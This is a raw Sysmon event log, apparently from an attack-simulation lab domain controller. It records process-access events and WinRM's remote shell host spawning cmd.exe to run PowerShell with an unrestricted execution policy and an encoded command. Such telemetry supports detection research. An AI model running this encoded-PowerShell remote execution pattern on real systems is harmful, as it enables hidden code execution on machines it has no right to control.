12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-6440-6064-D502-00000000AD01}7961608C:\Windows\system32\WinrsHost.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.320{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 
10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.294{266CAFBE-62DD-6064-1400-00000000AD01}13401036C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.279{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.263{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.263{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D602-00000000AD01}1296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.259{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
